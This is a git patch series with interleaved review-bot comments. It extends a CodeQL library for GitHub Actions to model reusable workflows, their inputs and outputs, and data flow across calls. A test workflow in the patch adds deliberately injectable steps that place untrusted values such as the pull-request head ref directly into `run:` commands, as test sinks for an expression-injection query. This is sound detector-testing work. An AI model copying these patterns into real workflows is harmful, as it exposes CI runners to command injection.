@@ -71,6 +114,11 @@ class JobStmt extends Statement instanceof Actions::Job { * out2: ${steps.foo.baz} */ JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + + /** + * Reusable workflow jobs may have Uses children + */ + JobUsesExpr getUsesExpr() { result = this.(Actions::Job).lookup("uses") } } /** @@ -104,19 +152,27 @@ class StepStmt extends Statement instanceof Actions::Step { JobStmt getJob() { result = super.getJob() } } +abstract class UsesExpr extends Expression { + abstract string getTarget(); + + abstract string getVersion(); + + abstract Expression getArgument(string key); +} + /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class UsesExpr extends StepStmt, Expression { +class StepUsesExpr extends StepStmt, UsesExpr { Actions::Uses uses; - UsesExpr() { uses.getStep() = this } + StepUsesExpr() { uses.getStep() = this } - string getTarget() { result = uses.getGitHubRepository() } + override string getTarget() { result = uses.getGitHubRepository() } - string getVersion() { result = uses.getVersion() } + override string getVersion() { result = uses.getVersion() } - Expression getArgument(string key) { + override Expression getArgument(string key) { exists(Actions::With with | with.getStep() = this and result = with.lookup(key) 
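Review bot: The QLDoc `Reusable workflow jobs may have Uses children` on `getUsesExpr` inverts the relationship: a job-level `uses:` marks a job that calls a reusable workflow, not a job inside one; `/** Gets the uses value of a job that calls a reusable workflow, if any. */` says what the predicate returns. In the second hunk `UsesExpr` becomes abstract with `getTarget`, `getVersion` and `getArgument`, but none of the abstract members carries QLDoc describing the contract subclasses must meet, and the `StepUsesExpr.getArgument` override continues past the end of the hunk.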
@@ -124,6 +180,54 @@ class UsesExpr extends StepStmt, Expression { } } +/** + * A Uses step represents a call to an action that is defined in a GitHub repository. + */ +class JobUsesExpr extends UsesExpr instanceof YamlScalar { + JobStmt job; + + JobUsesExpr() { job.(YamlMapping).lookup("uses") = this } + + JobStmt getJob() { result = job } + + /** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 + * local repo: ./.github/workflows/workflow-2.yml + * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 + */ + private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } + + private string pathUsesParser() { result = "\\./(.+)" } + + override string getTarget() { + exists(string name | + this.(YamlScalar).getValue() = name and + if name.matches("./%") + then result = name.regexpCapture(this.pathUsesParser(), 1) + else + result = + name.regexpCapture(this.repoUsesParser(), 1) + "/" + + name.regexpCapture(this.repoUsesParser(), 2) + "/" + + name.regexpCapture(this.repoUsesParser(), 3) + ) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { + exists(string name | + this.(YamlScalar).getValue() = name and + if not name.matches("\\.%") + then result = this.(YamlScalar).getValue().regexpCapture(this.repoUsesParser(), 4) + else none() + ) + } + + override Expression getArgument(string key) { + job.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + } +} + /** * A Run step represents the evaluation of a provided script */ diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index a2ebb10219ef..ac8ab616e3ec 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
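Review bot: The QLDoc above `JobUsesExpr` is copied from the step class ("A Uses step represents a call to an action ..."); this class represents a job-level `uses:` that calls a reusable workflow, and the comment should say so. `getTarget()` guards on `name.matches("./%")` while `getVersion()` guards on `not name.matches("\\.%")`, so a value such as `.github/workflows/x.yml` (no leading `./`) goes through the repo regex in one and is skipped in the other; use the same guard in both, `if not name.matches("./%")`. `getTarget()` also strips `./` for local paths but returns `owner/repo/path` for repository references, so a caller comparing it with a file path (the callable name in this series is a relative path) can only ever match the local form, which is worth a sentence in the QLDoc.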
+++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,6 +87,8 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } + private class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } + private class JobScope extends CfgScope instanceof JobStmt { } } @@ -120,9 +122,15 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(JobStmt), e) } + predicate scopeFirst(CfgScope scope, AstNode e) { + first(scope.(ReusableWorkflowStmt).getParams(), e) or + first(scope.(JobStmt), e) + } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(JobStmt), e, c) } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { + last(scope.(ReusableWorkflowStmt), e, c) or + last(scope.(JobStmt), e, c) + } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } 
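Review bot: `scopeFirst` enters a reusable workflow at `scope.(ReusableWorkflowStmt).getParams()` while `scopeLast` leaves through `last(scope.(ReusableWorkflowStmt), e, c)`, whereas the JobStmt case uses the scope node itself on both sides; since ReusableWorkflowTree's only child is the params node the two `last` forms coincide, but the entry skips the workflow node and the asymmetry is easy to misread. I'd use the same form on both sides, `first(scope.(ReusableWorkflowStmt), e) or first(scope.(JobStmt), e)`, or add a comment explaining why the params mapping rather than the workflow is the entry. The enclosing module continues outside the hunk.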
@@ -139,11 +147,30 @@ private import CfgImpl private import Completion private import CfgScope +private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { + override ControlFlowTree getChildNode(int i) { result = super.getParams() and i = 0 } +} + +private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof ParamsStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getParamExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class ParamExprTree extends LeafTree instanceof ParamExpr { } + private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - (child = super.getAStep() or child = super.getOutputStmt()) and + (child = super.getAStep() or child = super.getOutputStmt() or child = super.getUsesExpr()) and l = child.getLocation() | child @@ -157,7 +184,20 @@ private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStm override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } } -private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { +private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getArgument(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | 
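Review bot: The same five-line `rank[i](Expression child, Location l | ... order by l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString())` block is now repeated in ReusableWorkflowParamsTree, JobTree, StepUsesTree and JobUsesTree (and in RunTree above); one shared `private predicate childOf(AstNode parent, Expression child)` that each tree case contributes to, plus a single `getChildByLocation(AstNode parent, int i)` that does the ranking, removes the risk of one copy changing and the others not, which is already happening to the JobTree copy here. `ParamExprTree extends LeafTree instanceof ParamExpr` will cover every YamlValue unless ParamExpr is constrained in Ast.qll, which would make arbitrary expressions both a LeafTree and a child of other trees; confirm ParamExpr is restricted to `workflow_call` inputs. The JobUsesTree body continues past the end of the hunk.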
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 534eb4fe657b..1e6fbd5b8544 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -6,17 +6,32 @@ private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic cached -newtype TNode = TExprNode(DataFlowExpr e) +newtype TNode = + TExprNode(DataFlowExpr e) or + TParameterNode(ParamExpr p) { p = any(ReusableWorkflowStmt w).getParams().getParamExpr(_) } or + TReturningNode(Cfg::Node n) { n.getAstNode() = any(JobStmt j).getOutputStmt().getOutputExpr(_) } /** - * Not used + * Reusable workflow input nodes */ -class ParameterNode extends Node { - ParameterNode() { none() } +class ParameterNode extends Node, TParameterNode { + private ParamExpr parameter; + + ParameterNode() { this = TParameterNode(parameter) } + + predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { + parameter = c.(ReusableWorkflowStmt).getParams().getParamExpr(pos) + } + + override string toString() { result = parameter.toString() } + + override Location getLocation() { result = parameter.getLocation() } + + ParamExpr getParameter() { result = parameter } } /** - * Not used + * Reusable workflow output nodes */ class ReturnNode extends Node { ReturnNode() { none() } @@ -35,17 +50,25 @@ class OutNode extends ExprNode { } } +/** + * Not used + */ class CastNode extends Node { CastNode() { none() } } +/** + * Not used + */ class PostUpdateNode extends Node { PostUpdateNode() { none() } Node getPreUpdateNode() { none() } } -predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { none() } +predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { + p.isParameterOf(c, pos) +} predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition pos) { arg.argumentOf(call, pos) 
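Review bot: `TReturningNode(Cfg::Node n)` is added to `TNode` for job output expressions, but `ReturnNode() { none() }` is left as is and no Node subclass wraps the new injector, so outputs of a reusable workflow still never return to the caller and, unless `Node.toString()` and `getLocation()` already cover the branch elsewhere, the new TNode values have no string or location. Either wire `ReturnNode` to `TReturningNode` in this commit or mark it `// TODO: back ReturnNode by TReturningNode` so the half-finished branch is visible; the QLDoc on `ReturnNode` now reads "Reusable workflow output nodes" although the class is still empty. `ParameterNode.isParameterOf` keys positions by input name via `getParamExpr(pos)`, which is reasonable, but that ParameterPosition is the input name should be stated in its doc.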
@@ -64,7 +87,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action gets called + * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow gets called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof UsesExpr } @@ -79,27 +102,16 @@ class DataFlowCall instanceof Cfg::Node { DataFlowCallable getEnclosingCallable() { result = super.getScope() } } -// class DataFlowCallable instanceof Cfg::CfgScope { -// DataFlowCallable() { none() } -// -// string toString() { result = super.toString() } -// -// string getName() { result = "none" } -// } /** * A Cfg scope that can be called - * There are no callables in Actions, at least not in the AST + * ReusableWorkflowStmt */ -class DataFlowCallable instanceof Cfg::CfgScope { +class DataFlowCallable instanceof ReusableWorkflowStmt { string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { - if this instanceof StepStmt - then result = this.(StepStmt).getId() - else result = this.(JobStmt).getId() - } + string getName() { result = super.getName() } } newtype TReturnKind = TNormalReturn() @@ -114,7 +126,7 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { none() } +DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } // /** // * Holds if the set of viable implementations that can be called by `call` 
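Review bot: The `DataFlowCallable` doc now reads "A Cfg scope that can be called ReusableWorkflowStmt", which is a fragment left over from the deleted sentence, and the class is no longer a `Cfg::CfgScope` at all but `instanceof ReusableWorkflowStmt`. Suggested: `/** A callable: a reusable workflow (`ReusableWorkflowStmt`), named by the relative path of its file. */`. The removed commented-out class above it is a welcome cleanup.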
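Review bot: `viableCallable(DataFlowCall c) { c.getName() = result.getName() }` resolves a call purely by string equality between the callee text from `UsesExpr` and `ReusableWorkflowStmt.getName()`, which is the file's relative path, so from what is visible only `./path` references can match; a reference to the same repository written as `owner/repo/.github/workflows/x.yml@ref` yields a string that never equals a relative path and therefore has no viable callable. If that is intended, say so on the predicate: `/** Gets the reusable workflow whose relative path equals the callee text. Only local `./` references resolve; `owner/repo/path@ref` references, even to this repository, do not. */`.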
@@ -173,11 +185,10 @@ class ContentApprox extends TContentApprox { ContentApprox getContentApprox(Content c) { none() } /** - * Not used since we dont have Callables in the AST * Made a string to match the ArgumentPosition type */ class ParameterPosition extends string { - ParameterPosition() { none() } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getParams().getParamExpr(this)) } } /** @@ -188,18 +199,12 @@ class ArgumentPosition extends string { } /** - * Not really used since we dont have Callables in the AST but needed for the InputSig signature */ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } -/** - * a simple local flow step - */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } - -predicate usesOutputDefToUse(Node nodeFrom, Node nodeTo) { +predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(UsesExpr uses, StepOutputAccessExpr outputRead | + exists(StepUsesExpr uses, StepOutputAccessExpr outputRead | uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and @@ -233,11 +238,16 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - usesOutputDefToUse(nodeFrom, nodeTo) or + stepUsesOutputDefToUse(nodeFrom, nodeTo) or runOutputDefToUse(nodeFrom, nodeTo) or jobOutputDefToUse(nodeFrom, nodeTo) } +/** + * a simple local flow step + */ +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + /** * Holds if data can flow from `node1` to `node2` through a non-local step * that does not follow a call edge. For example, a step through a global diff --git a/ql/lib/test/.github/workflows/test.yml b/ql/lib/test/.github/workflows/test.yml index 2760a6c3d35f..754105a49e63 100644 
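Review bot: The doc block above `parameterMatch` is left as an empty `/** */` after its sentence was removed; since `ParameterPosition` is now an input name under `on.workflow_call.inputs` and `ArgumentPosition` is likewise a string (the `with:` key, per `getArgument`), the comment should state why plain equality is the right match: `/** Holds if argument position `apos` feeds parameter position `ppos`; both are the input / `with:` key name, so they match by string equality. */`. The `stepUsesOutputDefToUse` rename and the relocated `simpleLocalFlowStep` are behaviour-neutral as far as the hunks show.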
--- a/ql/lib/test/.github/workflows/test.yml +++ b/ql/lib/test/.github/workflows/test.yml @@ -13,7 +13,7 @@ jobs: fetch-depth: 0 - name: Get changed files - id: source + id: source uses: tj-actions/changed-files@v40 - name: Remove foo from changed files @@ -21,8 +21,12 @@ jobs: uses: mad9000/actions-find-and-replace-string@3 with: source: ${{ steps.source.outputs.all_changed_files }} - find: 'foo' - replace: '' + find: "foo" + replace: "" + - id: simplesink1 + run: echo ${{ steps.source.outputs.all_changed_files }} + - id: simplesink2 + run: ${{ github.event.pull_request.head.ref }} job2: runs-on: ubuntu-latest diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 2e358f3c30bd..31bcdc256d8a 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -12,7 +12,11 @@ query predicate jobNodes(JobStmt s) { any() } query predicate stepNodes(StepStmt s) { any() } -query predicate usesNodes(UsesExpr s) { any() } +query predicate allUsesNodes(UsesExpr s) { any() } + +query predicate stepUsesNodes(StepUsesExpr s) { any() } + +query predicate jobUsesNodes(JobUsesExpr s) { any() } query predicate usesSteps(UsesExpr call, string argname, Expression arg) { call.getArgument(argname) = arg 
@@ -42,17 +46,22 @@ query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode pare query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { any() } +query predicate cfgNodes(Cfg::Node n) { + //any() + n.getAstNode() instanceof JobUsesExpr +} -query predicate dfNodes(DataFlow::Node e) { any() } +query predicate dfNodes(DataFlow::Node e) { + e.getLocation().getFile().getBaseName() = "simple1.yml" +} query predicate exprNodes(DataFlow::ExprNode e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate localFlow(UsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } +query predicate localFlow(StepUsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } -query predicate usesIds(UsesExpr s, string a) { s.getId() = a } +query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } From 3152ed71babc92524cf2f7a326c4f3a212411fad Mon Sep 17 00:00:00 2001 
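Review bot: `cfgNodes` and `dfNodes` are narrowed to `JobUsesExpr` nodes and to `simple1.yml` with the original `any()` kept as `//any()`, which turns the test query's expected output into a snapshot of a debugging session and leaves commented-out code behind. If the narrowing is meant to stay, drop the `//any()` line and say what the filter is for, e.g. `// Restrict to reusable-workflow call nodes to keep the expected output small`; otherwise restore `any()` before merging.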
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 11:57:47 +0100 Subject: [PATCH 015/707] dataflow through reusable workflows --- ql/lib/codeql/actions/Ast.qll | 135 +++++++++++++----- ql/lib/codeql/actions/Consistency.ql | 3 + ql/lib/codeql/actions/DataFlow.qll | 8 ++ .../actions/controlflow/internal/Cfg.qll | 39 ++++- .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 78 +++++----- .../dataflow/internal/DataFlowPublic.qll | 42 +++++- .../.github/workflows/calling_workflow.yml | 28 +++- .../.github/workflows/reusable_workflow.yml | 21 ++- ql/lib/test/test.ql | 4 +- .../Security/CWE-094/ExpressionInjection.ql | 1 + ql/src/test/partial.ql | 33 +++++ 13 files changed, 298 insertions(+), 98 deletions(-) create mode 100644 ql/lib/codeql/actions/Consistency.ql create mode 100644 ql/src/test/partial.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8f8347e766f4..b84f884c034f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -39,23 +39,21 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { } class ReusableWorkflowStmt extends WorkflowStmt { - YamlMapping parameters; + YamlValue workflow_call; ReusableWorkflowStmt() { - exists(Actions::On on | - on.getWorkflow() = this and - on.getNode("workflow_call").(YamlMapping).lookup("inputs") = parameters - ) + this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - ParamsStmt getParams() { result = parameters } + InputsStmt getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } + + OutputsStmt getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } - // TODO: implemnt callable name string getName() { result = this.getLocation().getFile().getRelativePath() } } -class ParamsStmt extends Statement instanceof YamlMapping { - ParamsStmt() { +class InputsStmt extends Statement instanceof YamlMapping { + InputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) } 
@@ -72,12 +70,38 @@ class ParamsStmt extends Statement instanceof YamlMapping { * token: * required: true */ - ParamExpr getParamExpr(string name) { - this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + InputExpr getInputExpr(string name) { + result.(YamlString).getValue() = name and + this.(YamlMapping).maps(result, _) } } -class ParamExpr extends Expression instanceof YamlValue { } +class InputExpr extends Expression instanceof YamlString { } + +class OutputsStmt extends Statement instanceof YamlMapping { + OutputsStmt() { + exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) + } + + /** + * Gets a specific parameter expression (YamlMapping) by name. + * eg: + * on: + * workflow_call: + * outputs: + * firstword: + * description: "The first output string" + * value: ${{ jobs.example_job.outputs.output1 }} + * secondword: + * description: "The second output string" + * value: ${{ jobs.example_job.outputs.output2 }} + */ + OutputExpr getOutputExpr(string name) { + this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result + } +} + +class OutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -117,8 +141,13 @@ class JobStmt extends Statement instanceof Actions::Job { /** * Reusable workflow jobs may have Uses children + * eg: + * call-job: + * uses: ./.github/workflows/reusable_workflow.yml + * with: + * arg1: value1 */ - JobUsesExpr getUsesExpr() { result = this.(Actions::Job).lookup("uses") } + JobUsesExpr getUsesExpr() { result.getJob() = this } } /** @@ -152,8 +181,11 @@ class StepStmt extends Statement instanceof Actions::Step { JobStmt getJob() { result = super.getJob() } } +/** + * Abstract class representing a call to a 3rd party action or reusable workflow. + */ abstract class UsesExpr extends Expression { - abstract string getTarget(); + abstract string getCallee(); abstract string getVersion(); 
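Review bot: The doc comment on `OutputsStmt.getOutputExpr` is copied from the inputs accessor — "Gets a specific parameter expression (YamlMapping) by name" — but the predicate returns `lookup(name).(YamlMapping).lookup("value")`, i.e. the output's `value:` scalar, and `OutputExpr` is declared `instanceof YamlString`. Suggested wording, keeping the YAML example: `/** Gets the `value` expression of the workflow output named `name`, e.g. `${{ jobs.example_job.outputs.output1 }}` for `firstword` below. */`. Likewise `getInputExpr` now binds `result` to the key string (`result.(YamlString).getValue() = name and this.(YamlMapping).maps(result, _)`) rather than the input's mapping, so the doc above it, which sits outside this hunk, presumably still says `YamlMapping` and needs the same correction.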
@@ -168,7 +200,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { StepUsesExpr() { uses.getStep() = this } - override string getTarget() { result = uses.getGitHubRepository() } + override string getCallee() { result = uses.getGitHubRepository() } override string getVersion() { result = uses.getVersion() } @@ -183,12 +215,12 @@ class StepUsesExpr extends StepStmt, UsesExpr { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUsesExpr extends UsesExpr instanceof YamlScalar { - JobStmt job; - - JobUsesExpr() { job.(YamlMapping).lookup("uses") = this } +class JobUsesExpr extends UsesExpr instanceof YamlMapping { + JobUsesExpr() { + this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) + } - JobStmt getJob() { result = job } + JobStmt getJob() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. 
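Review bot: `getJob() { result = this }` combined with `JobStmt.getUsesExpr() { result.getJob() = this }` (previous hunk, L470) makes a job that calls a reusable workflow its own `getUsesExpr()`, and `JobTree.getChildNode` in Cfg.qll (L462 on this page) still lists `super.getUsesExpr()` among a job's children, so unless JobTree was changed elsewhere the job becomes a child of itself in the CFG tree. Either drop `getUsesExpr()` from JobTree's children now that the call is the job mapping itself, or keep `JobUsesExpr` as a separate node for the `uses` value. The class doc "A Uses step represents a call to an action that is defined in a GitHub repository" is also stale for this class: `/** A job whose `uses` key calls a reusable workflow; the job mapping itself is the call expression and its `with:` entries are the arguments. */`.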
@@ -200,31 +232,31 @@ class JobUsesExpr extends UsesExpr instanceof YamlScalar { private string pathUsesParser() { result = "\\./(.+)" } - override string getTarget() { - exists(string name | - this.(YamlScalar).getValue() = name and - if name.matches("./%") - then result = name.regexpCapture(this.pathUsesParser(), 1) + override string getCallee() { + exists(YamlString name | + this.(YamlMapping).lookup("uses") = name and + if name.getValue().matches("./%") + then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else result = - name.regexpCapture(this.repoUsesParser(), 1) + "/" + - name.regexpCapture(this.repoUsesParser(), 2) + "/" + - name.regexpCapture(this.repoUsesParser(), 3) + name.getValue().regexpCapture(this.repoUsesParser(), 1) + "/" + + name.getValue().regexpCapture(this.repoUsesParser(), 2) + "/" + + name.getValue().regexpCapture(this.repoUsesParser(), 3) ) } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { - exists(string name | - this.(YamlScalar).getValue() = name and - if not name.matches("\\.%") - then result = this.(YamlScalar).getValue().regexpCapture(this.repoUsesParser(), 4) + exists(YamlString name | + this.(YamlMapping).lookup("uses") = name and + if not name.getValue().matches("\\.%") + then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() ) } override Expression getArgument(string key) { - job.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } } @@ -287,6 +319,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { /** * A ExprAccessExpr where the expression evaluated is a job output read. * eg: `${{ needs.job1.outputs.foo}}` + * eg: `${{ jobs.job1.outputs.foo}}` (for reusable workflows) */ class JobOutputAccessExpr extends ExprAccessExpr { string jobId; 
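Review bot: `getCallee()` and `getVersion()` disagree on what counts as a local reference: the former tests `name.getValue().matches("./%")`, the latter `not name.getValue().matches("\\.%")`, so a value beginning with `.` but not `./` is treated as local by one and as an `owner/repo` reference by the other. Binding the scalar once, `exists(YamlString name, string value | this.(YamlMapping).lookup("uses") = name and value = name.getValue() and …)`, and using `value.matches("./%")` in both predicates removes the discrepancy and the three repeated `name.getValue()` calls per branch. The `getArgument` change to `this.(YamlMapping).lookup("with")` follows from the class now being the job mapping itself.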
@@ -294,9 +327,11 @@ class JobOutputAccessExpr extends ExprAccessExpr { JobOutputAccessExpr() { jobId = - this.getExpression().regexpCapture("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + this.getExpression() + .regexpCapture("(needs|jobs)\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 2) and varName = - this.getExpression().regexpCapture("needs\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + this.getExpression() + .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) } string getVarName() { result = varName } @@ -305,7 +340,35 @@ class JobOutputAccessExpr extends ExprAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputStmt().getOutputExpr(varName) = result + ( + // A Job can have multiple outputs, so we need to check both + // jobs..outputs. + job.getOutputStmt().getOutputExpr(varName) = result + or + // jobs..uses (variables returned from the reusable workflow + job.getUsesExpr() = result + ) + ) + } +} + +/** + * A ExprAccessExpr where the expression evaluated is a reusable workflow input read. + * eg: `${{ inputs.foo}}` + */ +class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { + string paramName; + + ReusableWorkflowInputAccessExpr() { + paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getParamName() { result = paramName } + + Expression getInputExpr() { + exists(ReusableWorkflowStmt w | + w.getLocation().getFile() = this.getLocation().getFile() and + w.getInputs().getInputExpr(paramName) = result ) } } diff --git a/ql/lib/codeql/actions/Consistency.ql b/ql/lib/codeql/actions/Consistency.ql new file mode 100644 index 000000000000..fa3a2bc9e5ce --- /dev/null +++ b/ql/lib/codeql/actions/Consistency.ql @@ -0,0 +1,3 @@ +import DataFlow::DataFlow::Consistency + + 
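Review bot: The new `job.getUsesExpr() = result` alternative in `JobOutputAccessExpr.getOutputExpr` links a `needs.<job>.outputs.<name>` read to the whole reusable-workflow call regardless of `varName`, so every output name of the called workflow maps to the same node; the precise target would be the callee's `getOutputs().getOutputExpr(varName)` value, which the hunk does not attempt. If the coarse step is deliberate, say so in the comment, which is also missing its closing parenthesis: `// jobs.<id>.uses: the call itself stands for every output returned by the reusable workflow (output name not resolved yet)`. `ReusableWorkflowInputAccessExpr.getInputExpr` resolves through any `ReusableWorkflowStmt` in the same file, which is fine only as long as one file holds one workflow.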
diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index d1e714e8fbc0..5040865be1d2 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -7,4 +7,12 @@ module DataFlow { private import codeql.actions.dataflow.internal.DataFlowImplSpecific import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic + + /** debug */ + private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific + import codeql.dataflow.internal.DataFlowImplConsistency as DFIC + module ActionsConsistency implements DFIC::InputSig { } + module Consistency { + import DFIC::MakeConsistency + } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index ac8ab616e3ec..057d7872ee3b 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,9 +87,9 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - private class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } + class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } - private class JobScope extends CfgScope instanceof JobStmt { } + class JobScope extends CfgScope instanceof JobStmt { } } private module Implementation implements CfgShared::InputSig { @@ -123,7 +123,7 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(ReusableWorkflowStmt).getParams(), e) or + first(scope.(ReusableWorkflowStmt).getInputs(), e) or first(scope.(JobStmt), e) } 
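Review bot: The consistency-check scaffolding (`/** debug */` on an import, `ActionsConsistency`, `Consistency`) is added inside the public `DataFlow` module with a non-private `import codeql.dataflow.internal.DataFlowImplConsistency as DFIC`, so internal consistency machinery becomes part of the library's exported surface rather than a test-only aid. Making the `DFIC` import `private` and documenting the module, `/** Consistency checks for the Actions dataflow implementation; intended for `Consistency.ql` only. */`, keeps it out of consumer scope. A QLDoc `/** debug */` on an import line is attached to nothing; a plain `//` comment reads better there.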
